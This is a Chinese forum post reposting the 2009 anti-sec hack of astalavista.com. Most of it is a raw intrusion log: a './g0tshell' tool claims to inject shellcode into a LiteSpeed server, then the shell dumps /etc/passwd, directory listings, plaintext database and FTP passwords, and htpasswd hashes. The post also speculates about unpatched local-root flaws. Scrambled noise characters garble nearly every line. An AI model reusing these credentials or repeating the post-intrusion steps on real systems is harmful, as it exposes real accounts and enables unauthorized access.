里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
. n1 D$ X( S; ?3 Z$ w) _1 D. t( G5 [( P1 \0 z% l
[root@front3 ~]# curl -I litespeedtech.com1 Q% e$ R' }+ T. I
HTTP/1.1 200 OK
4 _/ D! [, T \$ S. c. qDate: Fri, 05 Jun 2009 22:54:51 GMT0 R& Q& s, w* m9 r: F9 F: g8 X
Server: LiteSpeed( z# f! n m4 Y- B1 q
9 Z* I# U" v! J0 `
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
9 x0 S. y( `, \ u: `
& N& B, m$ D' E有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
7 l- ^( {5 _9 P/ f) Y7 p$ |+ u
, s' L; O0 [9 t* D& Z# [: I7 U g& |$ N" P( |: s# ~" g
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
/ p9 f8 K5 N f8 _" {& N4 g/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \- A) I( }) v* v3 M. w. m8 `
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
" O: a, I0 c* P9 a5 c\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /: J" C7 z3 P+ @1 N, h
\/ \/ \/ \/ \/ \/ \/ c/ N- J1 F8 N+ g
The Hacking & Security Community1 S/ G; G e& i9 T
[+] Founded in 1997 by a hacker computer enthusiast
) f! @3 R$ b) B' C[-] Exposed in 2009 by anti-sec group
$ x% \# a# {8 i+ S( R( ?$ H& M( r3 m5 D* p a% U2 p
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
3 g6 Y, I; ~2 Q( m>> 03. Who’s behind the site?
9 w F$ w/ [! _4 N( g>>; l- F k) \0 C% w% F& v
>> A team of security and IT professionals, and a countless number of contributors from all over the world.5 U% ? t9 }5 q5 g1 }
3 u' v$ h* L3 O9 I+ p4 U0 @
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?2 u Q) ` e) j6 }; |' C P
>>
( o. j( h2 a) K) G$ I+ g" M>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
& f9 \ p7 c# Z8 v6 wmilitary institutions.% J! o4 Z% M. k) c& o. O3 v1 q( L
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.- A( _6 K1 Z$ I8 {! G
\. M; a7 F1 n+ I' d! N9 z9 x
Why has Astalavista been targeted?
) @% k. o, X9 l5 I% @8 S: s
) Z. u1 i7 b7 e; W5 N1 XOther than the fact that they are not doing any of this for the “community” but. J) Q% ~/ M: V) v4 ~9 |% F, J
for the money, they spread exploits for kids, claim to be a security community
# A6 G7 Q( p$ \. Z3 Z4 ?(with no real sense of security on their own servers), and they charge you $6.66" d; ~; i1 G7 m2 a1 X! v8 ~
per months to access a dead forum with a directory filled with public releases" D0 m( t4 T8 Q4 X R
and outdated / broken services.
- {+ S: D- i9 _( p4 V2 ?, i4 C1 Y% t8 _1 M" Z
We wanted to see how good that “team of security and IT professionals” really is.8 _4 \, T5 \( k- D6 S% o2 x
+ x) g4 _* `! v" FLet’s begin.0 [9 i* J1 P2 Q2 }: w$ o/ r
/ G' l0 \! D% n3 d: U
anti-sec:~# ./g0tshell astalavista.com -p 80: N; T0 C3 W) {. u% ~) X% U+ I
[+] Connecting to astalavista.com:80
0 k6 ~: t8 U5 Q- y$ v[+] Grabbing banner…
Z0 F5 R+ g& rLiteSpeed
0 U# H6 z# t, O/ j[+] Injecting shellcode…
. V7 U) H% K8 T0 [% p% d" {0 j2 N6 V: x[-] Wait for it& g5 k% t2 w, E' l( A' s
) ?6 d- m/ H5 R0 {) W0 G, j
[~] We g0tshell
, ~! }8 X* ~$ k" \- o) n; d% `( |uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
# v. U# B- f; N1 ~' I/ J: v: L+ P( mID: uid=100(apache) gid=500(apache) groups=500(apache)3 B& W+ s; L1 I. J# s
! Q; O1 H3 s! x5 D
sh-3.2$ cat /etc/passwd7 h2 E! R: x Y9 w: q/ b
root:x:0:0:root:/root:/bin/bash, g. C$ |5 a% n. [( D
bin:x:1:1:bin:/bin:/sbin/nologin: K- Z; |4 r9 t, Y" w
daemon:x:2:2:daemon:/sbin:/sbin/nologin0 p# S7 a) o5 v A( j. |' t# A" W
adm:x:3:4:adm:/var/adm:/sbin/nologin& M( Y ^2 p9 A; z
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
5 z7 [% u, I! S* R( isync:x:5:0:sync:/sbin:/bin/sync
: V! G4 f6 y$ J( r+ H* Wshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown$ w, _2 |/ [$ j( A6 ]9 z
halt:x:7:0:halt:/sbin:/sbin/halt
0 h# ]7 |% j3 g! g, d! X/ g. N5 {9 jmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
( X+ s N0 b2 s1 e3 Jnews:x:9:13:news:/etc/news:
1 a0 N& H3 s' g8 R) U B3 ^uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
$ h) K; Y. ~% U& w, Roperator:x:11:0 perator:/root:/sbin/nologin
& V! w. h4 Z- ~. igames:x:12:100:games:/usr/games:/sbin/nologin
c i3 {; d# F; |. x0 Ugopher:x:13:30:gopher:/var/gopher:/sbin/nologin3 P( z" Z D+ c
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+ R4 F* E+ ~: j) x! [- p! mnobody:x:99:99:Nobody:/:/sbin/nologin
. J+ d8 ?1 B5 ^/ L+ Qrpm:x:37:37::/var/lib/rpm:/sbin/nologin9 o( Q K: h8 m& r7 O V. P: H! M0 F
dbus:x:81:81:System message bus:/:/sbin/nologin
( ]' J2 e5 |% v1 S* }! l! gnscd:x:28:28:NSCD Daemon:/:/sbin/nologin$ T3 r% r+ Q. c. K
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
9 d! O4 P [& i1 Q: O H4 U* ksmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin% w+ G1 L; d! B
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin8 t9 r4 D ~8 y. X
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
3 v* W$ N3 X6 K) srpc:x:32:32 ortmapper RPC user:/:/sbin/nologin0 q: e5 v: d8 F8 ]4 O# x* y
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin* {- C+ t, d0 u# e4 v9 h
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin6 @( g X& r' H6 I
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin" K3 w, |$ Y6 t6 x3 g& H6 z/ W. x
pcap:x:77:77::/var/arpwatch:/sbin/nologin4 I' M/ ]& W/ S- _
named:x:25:25:Named:/var/named:/sbin/nologin$ T! H6 K5 I+ @/ ^' L7 I
apache:x:100:500::/var/www:/bin/false+ p( h' r- `) k9 F; b g
diradmin:x:101:101::/usr/local/directadmin:/bin/bash" q8 Z8 D5 W: W! {# ^* A* R
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash& ~/ v H0 O9 L1 i
webapps:x:500:501::/var/www/html:/bin/bash
, C5 {- o: ^% Z+ ~majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash/ [6 |# }2 L7 Q& C
admin:x:501:502::/home/admin:/bin/bash$ G( u! \9 ?, [1 D/ ^2 }
jon:x:502:503::/home/jon:/bin/bash1 |5 L! P& F; u* e r) W
com:x:503:504::/home/com:/bin/bash6 D' k6 Y% q$ m$ h8 ]- f
ntp:x:38:38::/etc/ntp:/sbin/nologin
3 \/ |* H! E- y+ |4 C- I, Gais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
& F, F. o4 a' D. z$ D+ X4 X3 uastanet:x:504:505::/home/astanet:/bin/bash
4 B. M0 E# Q. k/ G7 u4 ?( t- }7 E; H- N' savahi:x:70:70:Avahi daemon:/:/sbin/nologin
: C4 ?3 w. ?- q( q0 ^/ I. T2 yavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin) @; a0 C0 c5 p: F; ]9 C
+ n+ U8 V) }3 n' z4 [7 v
sh-3.2$ cat /etc/hosts, W: S; [' n8 A. I9 j) Q# {' K# T
# Do not remove the following line, or various programs$ n- b( p& S1 s" p: d" E: y
# that require network functionality will fail.
1 U, D+ B ~0 x5 w127.0.0.1 localhost.localdomain localhost
. l: {4 r! W0 m3 ^% ]4 @::1 localhost6.localdomain6 localhost6; I' z/ e/ I! P; E3 H2 |% m
80.74.154.172 asta1.astalavistaserver.com; V4 W1 Y y5 e& J0 C% X
, j, ~2 W% ? w7 A- N
sh-3.2$ pwd- d1 T3 M4 i$ \5 _0 I
/home/com/public_html
( W! p$ E$ @( `/ `+ E, W- ^; J0 C# q0 A' r0 v
sh-3.2$ ls -la! A2 d2 A: ]- v% j) ~
total 18460
8 Y7 _7 Y! L; j+ s. H; M1 Qdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
- n# a/ r: T" I+ E( P7 vdrwx–x–x 11 com com 4096 Jun 25 2008 ..
2 a X+ P! w$ ^5 rdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin9 m. u* Q$ z1 y9 I3 x0 l; w
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache( W9 ~0 |0 ^, b& g) i
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
7 X' o& ?% ~+ ndrwxrwxrwx 2 com com 4096 May 19 00:50 config$ u# I, c' ]) x- T7 n$ U1 ?1 R
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
+ f4 r2 a M0 S/ | x5 h' a; d" Z8 }drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules% F$ I2 q# Y. V7 _
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing4 @9 T. N5 u7 L0 L
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo M% V! L2 M+ Y3 Z% ?% r
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__& A* D# i( v3 o" b3 b4 Q# M
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php' s; ^: m) p9 w3 o5 l
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
5 W/ j1 u3 ?& Zdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor2 k/ B( p% }* |; c# L
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
9 j( V+ I7 w* f# Bdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed: Y( K* v5 Y! v; B6 r1 Z- n: G
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess9 |) {! {1 S3 E0 Q; H$ l0 c& V8 w% C
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak) k5 ?; n4 P1 g7 K t0 k) [% x
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
- K& h1 S, ?' S2 ^drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
( J, e7 y6 j* }* a* D5 udrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
( P# {8 y' X( P6 g" b$ ]: N* g0 Y-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
5 N; V/ E. a7 [( x( Tdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
4 N* k9 e% U. X: V4 g$ ydrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang1 L- _, Y+ ]1 Y1 i' @
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib& n2 y" w# ?3 G5 Y8 M
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
9 |9 S7 Z+ b% s) s! ^drwxr-xr-x 8 com com 4096 May 11 12:48 modifications. l! O; A( j& S
drwxr-xr-x 34 com com 4096 May 28 16:30 modules6 O7 K4 {6 P% T; m
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
( _: v0 j0 [8 X Y# Jdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
! _4 O$ s# v' odrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
3 P! T: E' k4 Z0 l Y6 ^drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy9 m1 q4 n3 \# ^- d" {" t' A% B
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy3 p5 |. }9 U/ |& N
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
, J3 B& F1 E( Y# B H-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml, d. M: S6 G) D( n& \' V
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
( ^2 a0 C; }0 P% R7 v# d& Mdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
) p. t5 d7 n1 Idrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp1 `) h# D2 O* a9 \/ \# a o" P; P' _
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
9 `: R) P. i3 ]# b- Q/ l4 l& D1 G5 r! O8 b" l
sh-3.2$ head -20 index.php: u- x) E( A& T6 F6 { _
<?php& V/ N9 j3 g: B
7 k( Q% M' ]0 K8 m5 e9 S8 } X
/**) C! T& v( @& Y0 g! b
* The main page for the CMS
* b# [7 m; d) _, Y2 O* @copyright CONTREXX CMS - COMVATION AG
% @! c/ @+ ]/ v* @author Comvation Development Team
+ A( z7 |2 h6 q$ _+ f) b* @version v1.0.9.10.1 stable: S; z" x9 u* Z, L/ J/ B
* @package contrexx
& r0 z" W* `0 x" @* @subpackage core2 z" B5 O6 Z F, |
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
* Y2 s: ?0 P. v# k6 e* @since v0.0.0.09 {' L9 {( q5 f) n
* @todo Capitalize all class names in project8 Y7 Y O+ s4 B1 X
* @uses /config/configuration.php. ^9 g7 i8 `. J( L" _
* @uses /config/settings.php7 J6 _% G! B8 Q, r
* @uses /config/version.php$ k# W7 |& O. k6 k& U
* @uses /core/API.php1 N! r8 T& S% e; s7 U) |1 m5 b
* @uses /core_modules/cache/index.class.php
! q$ j# I! H1 D! m/ X, c1 z }* @uses /core/error.class.php
* P+ l/ m$ y2 w7 ]* @uses /core_modules/banner/index.class.php2 z6 L4 W1 v0 y( y# e6 ~
* @uses /core_modules/contact/index.class.php
& G" ~" Q3 v) y1 T% i% W1 t+ T8 e7 r% ~$ E4 y% \$ o* @" U" W
sh-3.2$ cd config/
" V7 j0 B. `1 i$ fsh-3.2$ ls -la' d% N0 Y. M! n d; u. G6 z
total 32
% d* x; ~* [6 V+ P% X' D6 \7 x1 ^drwxrwxrwx 2 com com 4096 May 19 00:50 .
0 w- u/ F. J( U5 T! [drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) L& Z- F* e! v-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
. z9 N$ F+ ^# S) {; N-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
# n1 d7 @1 P2 `( j3 Q-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
. E7 u- S; Q; I& s-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php! Y6 _: S; J5 z0 ]! p {# Q5 b( W
) `( G; {( \1 j2 }2 n+ G0 csh-3.2$ cat configuration.php
8 x# w( i1 v+ o& w$ b( _[snip]+ p* i5 o1 V0 R$ ?: n. R
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost0 j1 q+ ~% X' f* V+ i. ^$ x
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name) }% L8 U/ e U% v2 v5 w4 {" X5 V
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix$ q) j% w- l5 M6 U" V* U9 T- w
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username- a/ E, l' C8 w/ V# @
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password4 p# b! C- h+ ]: | _
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
9 U/ r- Z* k9 k% u$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
: K Q; f! p3 d" T# O# w9 J[snip]- T9 @3 [( G$ E% q5 e$ \
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false8 R8 B4 U4 s1 X# |# y" D7 N& L
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
. h% L7 Q! m* V C$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost1 C0 b1 e; ]8 f% U- v2 r$ H4 r8 O) z
$_FTPCONFIG['port'] = 21; // Ftp remote port+ _9 \7 B3 W6 o7 d
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username- x4 }: D9 f; j1 p
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password3 R* \6 `5 g# H3 p0 t2 V z
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms1 J- v4 T7 U! M8 v9 Z1 N. i
2 q- ~! n" L+ g: g2 esh-3.2$ cd ..4 \4 b$ E6 Z8 S& c7 g. V
sh-3.2$ cd dvd/7 E. _* m8 g& H C( s3 p
sh-3.2$ ls -la
$ ~! w5 N& ~5 N7 Itotal 2913780 T: G/ @$ q [! l
drwxr-xr-x 2 com com 4096 Sep 9 2008 .6 S& ?. j2 N3 f4 ]! o6 Y' ]7 r
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
4 ~6 }0 @+ r1 n, f" H8 a-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar# X K8 L3 m0 D+ n9 @
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar8 ~/ S' l" k3 ~
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar" w+ U, \9 K) A2 U
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
6 P' j, q# D9 E* W" n6 O# N$ J0 _2 ]8 l, a
sh-3.2$ cat .htaccess
! v" W/ E, h8 j$ `authType Basic
0 k, a- G* G6 @# l& b+ dauthName DVD2 h1 J" F. a/ }
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
/ e" V0 G7 q) ~6 ^) F/ Zrequire valid-user
" s9 X1 N8 w* G7 V, l; E* n& Y9 W" m4 W
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
2 d' o% g" ^, r, ?3 q/ b }% X6 w" aDVDdownload:CRD8cuY6.MPT6
+ J7 O3 r! r- t. ~' o6 Z1 ]# vDVDdownload2:CR8a36.wluFMg! @& I- e+ D' E+ H0 {
1 u6 ^% j8 W/ N2 Q9 Jsh-3.2$ cat test.php
" I f' t) }% u' j* r9 ^<?php
2 r& n4 p# v6 V$ O/ h$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;+ p, d) Q# o- }: p: D
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));7 D) H5 ` s2 p: H' S# l
echo $url;7 n1 {" b! `1 i0 k, D
?>6 |3 U6 k+ C* B( K- [
1 `, u0 R: |& g/ f* i0 q" ]sh-3.2$ cd modifications/
, O- I' ~# H, T! [" zsh-3.2$ ls -la0 G7 v- y, z: y$ {
total 32
' Q! H( s. `( U# p9 L8 s" Ydrwxr-xr-x 8 com com 4096 May 11 12:48 .
) `2 [3 |1 r( T, xdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
3 z2 x6 L `* Mdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng6 w4 ~4 T, J/ K( a, I
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
2 r+ f& D2 [" i* b- g- a( f* h- ]drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools2 r" R3 S1 w7 t( U: |; d: D
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc! J& A1 f3 @0 L' M3 M1 ~+ ?. k
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
+ T/ _* C# A* L2 p% }+ i, idrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
# M9 l4 E2 D4 e/ X- a; w
. H+ r, |' e7 E8 e a* @5 ^sh-3.2$ ls -R3 x+ ?6 H+ N1 A# L4 T
.:- Y/ [9 \/ s. ?" A; H
com_avtng cronjobs onlinetools pjirc search _tmp
8 S8 H) m/ y0 W7 L9 D% P% m* F+ v+ v
./com_avtng:
. x& G8 D2 {- D+ y' v1 Q3 A: j1 ravtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
) M& B; U) h: f. @2 J+ N6 a L3 Q8 \- V
./com_avtng/scripts:
* e# G1 X# w& D+ gpopunder.js& D4 a6 y1 y2 B0 R7 o
* y5 l/ X7 ]; [1 Z) l
./cronjobs:/ ?7 E8 V. G! w
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp) k9 A' h, T$ g5 b; }
$ T. M* Z; a+ z9 L- j! a `% \
./cronjobs/tmp:
" f* I1 l, b, r- X6 Pcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv( K1 X& V3 r% M4 [! w1 c+ K% y* X' t
D9 x. _8 j+ p5 L/ P* J! M
./onlinetools:
+ Q: e, |1 V) j8 Rindex.php3 f# m- q# J( x5 `( |
+ k2 V- r" T+ U' b- H
./pjirc:
( L! c) Q+ i5 ]* P& T# G& K1 Ha_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt d/ h7 T, l: N" ^( i& ~
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt0 H( S4 E4 W M+ Q+ Z
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd* R0 u F" l+ X% Z1 R q" A$ O- `
- `( V! Q' g X; @# @5 L+ ` y./pjirc/img:' o0 _& F) x6 c: |
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif1 D/ a) r3 ~ N
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif / p$ T- `, ]! f' c' J8 q5 {2 P
verre-eau.gif
1 I1 v' L0 I+ ?argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
% R `5 G' `) n4 Averre-vin.gif
5 h9 p2 a5 a" _1 eballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif6 V8 _! H2 o4 d. s4 }: \( {
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
' o- f0 i+ |& y# e4 Y3 W# k7 b4 J( R- ]; O% u
./pjirc/snd:5 K8 p$ @8 N& v' P# @ `
bell2.au ding.au, ^3 @4 U9 T0 K8 G4 B
% j" \5 H5 m( ~$ e4 \# W./search:
- V) E% b& X+ I/ K, f9 v% W8 @searchEngines.php search.php" Y1 y9 m3 F/ p2 X+ [9 O/ u0 |
# Y6 a, m( D9 ~% j9 m
./_tmp:
3 X* t* r# m; {' ~( k0 T! RdefaultPorts.php defaultPorts.txt
( H% \! G- [) c6 Q* o) N% O% v3 D* N2 r9 w8 J8 ]
sh-3.2$ cd cronjobs/
+ K& T2 E& l8 O2 Hsh-3.2$ cat exploits.php2 J# ? a+ c; o2 s' I R% `
[snip]( x- t# ]. X+ l9 m2 ~- R0 ]
$categories = array();$ o6 P3 n7 v+ M
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
4 c" h& W d9 m$expolits = file($milw0rmFile);
8 A" K# W$ L _$comExploits = array();0 \" d2 ~* y+ j* G; {3 K1 l" @& y x
[snip]
' o. s: ~+ _6 `2 u3 m) r% C// manage data
k6 V* J' L$ P$ \4 Ifor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
2 \* f8 j* I& c) d& d# f, ~
i2 S5 a* X" y* L4 D // get path and title
. x/ b* |, {9 D/ H& G' K $expolits[$x] = trim($expolits[$x]);
9 I. }' r. h3 W' q5 h+ C- i7 o $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));2 A) @. T# K0 A! F& K$ j- R
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);5 I% h$ B3 d$ J; G5 ~ T( O1 s
) I+ W8 V: [! F7 @& j
// check if file exists, d) r$ Q- ^. R$ s5 Y' o3 G# t
if (file_exists($path)) {
" U M5 F& _$ @4 U( D
; A# Y0 q8 J& O9 j8 p $text = file_get_contents($path);+ y ]0 Q7 b6 l3 w+ T3 R* _ S5 K
. _& }2 Y. ]2 m2 `$ g
// get content and date: t; [. [, @6 R {9 m: i- b' B e
//$text = htmlspecialchars($text, ENT_QUOTES);$ H* ~' p7 v. D9 B9 z7 ]% `8 h7 C
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
8 ~! Z Y3 f. g6 H if ($tmptext != ”) {* Y7 J! ?4 m& Q6 \. X$ O* `
$text = $tmptext;
n7 \% [: K( [3 R } else {
; k& ^+ K, H3 B* i0 @ $text = addslashes(htmlentities($text, ENT_QUOTES));
: _) P" A- p; M* e! Q6 M }
1 @) R; [9 Y6 x1 ]% \ $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
# @! k" o% `. y" [2 @ $tmp = explode('-', $date);
( d6 Z- Z) Y+ Q! O $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
3 O' i2 L% Q. d: z5 c $cat = getCategory ($path);5 q! P+ Z; R' S7 |' I" L
$ext = pathinfo(basename($path));5 `( y. ^- {/ e1 W
$ext = $ext['extension'];
" A$ ^9 }( x1 ~, }3 X9 f $qStr = ”
$ C* K, u! u( e& w2 k: N SELECT `id`
; z9 \, [. R+ d- X* @, v FROM `contrexx_module_exploits`
9 F( Y; k$ A/ U3 F# H WHERE `title` = ‘” . $title . “‘- \3 K3 n* w6 k- j! T1 y' @
AND `date` = ‘” . $date . “‘
/ B2 j( ?! ?& P “;! [2 M# J% Z3 `* m, K( d
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;" L# A, W! ]' ?% j e. d
$q = $_objDB->query($qStr);
0 B: m8 E% ~4 b5 M# n z! U7 [( Y5 \) y, x
if ($q->numRows() == 0) {
( [) A' ~3 p' n; \% j3 |/ J" j! @6 Y3 H! q" `" y
// prepare array
0 v. b; E4 K+ ?1 ]4 Y $comExploits[$x]['date'] = $date;
# Q3 T, a0 q4 {! x $comExploits[$x]['title'] = $title;+ H( }) q9 j3 w' e- W
$comExploits[$x]['author'] = ‘milw0rm’;3 l- @! f% ~3 V/ [4 Q
$comExploits[$x]['text'] = $text;# w4 b0 s5 H. G, S& {) p
$comExploits[$x]['source'] = $ext;
4 E, I2 {/ H3 f# W: s8 P/ D3 C/ F $comExploits[$x]['url1'] = ”;- f7 a. p* |2 Z/ j, b
$comExploits[$x]['url2'] = ”;7 {, O/ B; O+ A
$comExploits[$x]['catid'] = $cat;
/ P8 }* g1 a# C f $comExploits[$x]['lang'] = ‘2′;
, e6 F9 {2 o/ h6 @2 S $comExploits[$x]['userid'] = ‘12′;
# p) `1 @% W: Q0 D$ i0 X $comExploits[$x]['startdate'] = ‘0000-00-00′;, y9 r, u; ?0 u" R6 q1 X x
$comExploits[$x]['enddate'] = ‘0000-00-00′;
& V9 k3 P" @" Y& a- d9 U $comExploits[$x]['status'] = ‘1′;
J1 i5 m5 r4 i+ k. e- ~ $comExploits[$x]['changelog'] = $date;
0 I1 g- K1 g s% @* {# |+ r1 w5 x7 P) k, P- ^
}
6 u! ^+ Y; u- l0 u+ k6 \: H[snip]
H2 L, V# d. b- p/ T $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?> Y7 N3 ~, O( O; ]# s
<rss version=”2.0″>
4 \0 ]' T' u) D- v <channel>, L9 q# s/ n( p3 t
<title>ASTALAVISTA.com - Exploits</title>
a H, v* z, ?% Y3 y* u) E1 D <link>http://www.astalavista.com/exploits</link>$ S% n4 N# N$ ^% @9 ~
<description>All availably Exploits.</description>+ f! Q, o2 y& g$ y: ^
